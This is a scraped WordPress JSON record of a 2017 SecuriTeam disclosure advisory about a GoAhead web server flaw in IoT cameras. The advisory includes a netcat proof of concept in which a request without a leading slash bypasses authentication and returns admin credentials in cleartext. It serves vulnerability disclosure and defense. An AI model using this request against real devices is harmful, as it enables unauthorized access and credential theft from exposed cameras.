{"id":6925,"date":"2017-03-09T14:19:30","date_gmt":"2017-03-09T22:19:30","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/03\/09\/news-716\/"},"modified":"2017-03-09T14:19:30","modified_gmt":"2017-03-09T22:19:30","slug":"news-716","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/03\/09\/news-716\/","title":{"rendered":"SSD Advisory &#8211; Over 100K IoT Cameras Vulnerable to Source Disclosure"},"content":{"rendered":"<p><strong>Credit to Author: noam| Date: Thu, 09 Mar 2017 08:34:23 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes an arbitrary file content disclosure vulnerability found in GoAhead web server.<\/p>\n<p>The GoAhead web server is present on multiple embedded devices, from IP Cameras to Printers and other embedded devices.<\/p>\n<p>The vulnerability allows a remote unauthenticated attacker to disclose the content of the file being accessed. As most embedded devices do not run a SQL (or SQL-like) daemon, the credentials for authentication are stored inside the file being accessed. Through this disclosure attack, an attacker can view the credentials required to access the device.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher Istvan Toth has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Update: the vendor (GoAhead) claims the vulnerability is not in his product, but rather in the camera vendor&#8217;s code.<\/p>\n<p>We at Beyond Security, are unsure about this, but as none of the camera vendors responded, we are left in the dark at the root cause for the vulnerability.<\/p>\n<p>Since this vulnerability affects practically multiple devices that have the GoAhead web server (these devices appear to implement old versions of GoAhead), there is no one company you can report these vulnerabilities to or get them addressed &#8211; further the majority of the products that are vulnerable are OEM products with no real &#8220;vendor&#8221; behind them.<\/p>\n<p>We urge users who have an embedded device and have GoAhead running on them, you can know this by seeing the following banner returned when you connect to the device:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58c1d4f11202d260717081\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Server: GoAhead-Webs<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>To remove the device from the network, or at the very least not allow access to the web interface to anyone beside a very strict IP address range.<\/p>\n<p><span id=\"more-3043\"><\/span><\/p>\n<p><strong>Vulnerabilities Details<\/strong><br \/> The vulnerability is triggered sending a malformed request to the web server, you can see the difference between the regular request and the vulnerability triggering request here:<\/p>\n<p><em>Normal request-response<\/em><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58c1d4f112039966855893\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> $ echo -e &#8220;GET \/login.cgin&#8221; | nc 192.168.88.131 81  nc: using stream socket  HTTP\/1.1 401 Unauthorized  Server: GoAhead-Webs  Date: Sun Feb 19 12:59:31 2017  WWW-Authenticate: Digest realm=&#8221;GoAhead&#8221;, domain=&#8221;:81&#8243;,qop=&#8221;auth&#8221;, nonce=&#8221;ecfe10f4065c572c386bf68494d0c15a&#8221;, opaque=&#8221;5ccc069c403ebaf9f0171e9517f40e41&#8243;,algorithm=&#8221;MD5&#8243;, stale=&#8221;FALSE&#8221;  Pragma: no-cache  Cache-Control: no-cache  Content-Type: text\/html    &lt;html&gt;&lt;head&gt;&lt;title&gt;Document Error: Unauthorized&lt;\/title&gt;&lt;\/head&gt;  &lt;body&gt;&lt;h2&gt;Access Error: Unauthorized&lt;\/h2&gt;  &lt;p&gt;Access to this document requires a User ID&lt;\/p&gt;&lt;\/body&gt;&lt;\/html&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f112039966855893-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58c1d4f112039966855893-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f112039966855893-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58c1d4f112039966855893-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f112039966855893-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58c1d4f112039966855893-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f112039966855893-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58c1d4f112039966855893-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f112039966855893-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58c1d4f112039966855893-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f112039966855893-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58c1d4f112039966855893-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f112039966855893-13\">13<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58c1d4f112039966855893-1\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">echo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">e<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;GET \/login.cgin&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">nc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.88.131<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">81<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58c1d4f112039966855893-2\"><span class=\"crayon-v\">nc<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">using <\/span><span class=\"crayon-e\">stream <\/span><span class=\"crayon-e\">socket<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58c1d4f112039966855893-3\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">401<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Unauthorized<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58c1d4f112039966855893-4\"><span class=\"crayon-v\">Server<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GoAhead<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Webs<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58c1d4f112039966855893-5\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Sun <\/span><span class=\"crayon-i\">Feb<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">19<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">59<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">31<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2017<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58c1d4f112039966855893-6\"><span class=\"crayon-v\">WWW<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Authenticate<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Digest <\/span><span class=\"crayon-v\">realm<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;GoAhead&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">domain<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;:81&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">qop<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;auth&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nonce<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;ecfe10f4065c572c386bf68494d0c15a&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">opaque<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;5ccc069c403ebaf9f0171e9517f40e41&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">algorithm<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;MD5&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stale<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;FALSE&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58c1d4f112039966855893-7\"><span class=\"crayon-v\">Pragma<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">cache<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58c1d4f112039966855893-8\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">cache<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58c1d4f112039966855893-9\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58c1d4f112039966855893-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58c1d4f112039966855893-11\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">title<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Document <\/span><span class=\"crayon-v\">Error<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Unauthorized<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">title<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58c1d4f112039966855893-12\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">h2<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Access <\/span><span class=\"crayon-v\">Error<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Unauthorized<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">h2<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58c1d4f112039966855893-13\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Access <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">document <\/span><span class=\"crayon-i\">requires<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">User <\/span><span class=\"crayon-v\">ID<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0025 seconds] -->  <\/p>\n<p><em>Vulnerability triggering request-response<\/em><br \/> Request without leading &#8216;\/&#8217; bypasses HTTP basic auth. Moreover, requesting login.cgi responds the cleartext credentials<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58c1d4f11203c603251381\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> $ echo -e &#8220;GET login.cgin&#8221; | nc 192.168.88.131 81  nc: using stream socket  HTTP\/1.1 200 OK  Date: Sun Feb 19 12:59:36 2017  Server: GoAhead-Webs  Last-modified: Thu Jan 1 00:00:00 1970  Content-type: text\/html  Cache-Control:no-cache  Content-length: 77  Connection: close    var loginuser=&#8221;admin&#8221;;    var loginpass=&#8221;xxxx&#8221;;    var pri=255;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f11203c603251381-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58c1d4f11203c603251381-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f11203c603251381-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58c1d4f11203c603251381-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f11203c603251381-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58c1d4f11203c603251381-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f11203c603251381-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58c1d4f11203c603251381-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f11203c603251381-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58c1d4f11203c603251381-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f11203c603251381-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58c1d4f11203c603251381-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f11203c603251381-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58c1d4f11203c603251381-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58c1d4f11203c603251381-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58c1d4f11203c603251381-16\">16<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58c1d4f11203c603251381-1\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">echo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">e<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;GET login.cgin&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">nc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.88.131<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">81<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58c1d4f11203c603251381-2\"><span class=\"crayon-v\">nc<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">using <\/span><span class=\"crayon-e\">stream <\/span><span class=\"crayon-e\">socket<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58c1d4f11203c603251381-3\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">OK<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58c1d4f11203c603251381-4\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Sun <\/span><span class=\"crayon-i\">Feb<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">19<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">59<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">36<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2017<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58c1d4f11203c603251381-5\"><span class=\"crayon-v\">Server<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GoAhead<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Webs<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58c1d4f11203c603251381-6\"><span class=\"crayon-v\">Last<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">modified<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Thu <\/span><span class=\"crayon-i\">Jan<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1970<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58c1d4f11203c603251381-7\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">html<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58c1d4f11203c603251381-8\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">cache<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58c1d4f11203c603251381-9\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">77<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58c1d4f11203c603251381-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58c1d4f11203c603251381-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58c1d4f11203c603251381-12\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">loginuser<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;admin&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58c1d4f11203c603251381-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58c1d4f11203c603251381-14\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">loginpass<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;xxxx&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58c1d4f11203c603251381-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58c1d4f11203c603251381-16\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pri<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">255<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0024 seconds] -->  <\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3043\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: noam| Date: Thu, 09 Mar 2017 08:34:23 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes an arbitrary file content disclosure vulnerability found in GoAhead web server. The GoAhead web server is present on multiple embedded devices, from IP Cameras to Printers and other embedded devices. The vulnerability allows a remote unauthenticated attacker to disclose the content of the file being accessed. As most embedded &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3043\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; Over 100K IoT Cameras Vulnerable to Source Disclosure<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11591,10757],"class_list":["post-6925","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-file-disclosure","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6925","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6925"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6925\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6925"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6925"},{"taxonomy":"post_tag","embeddabl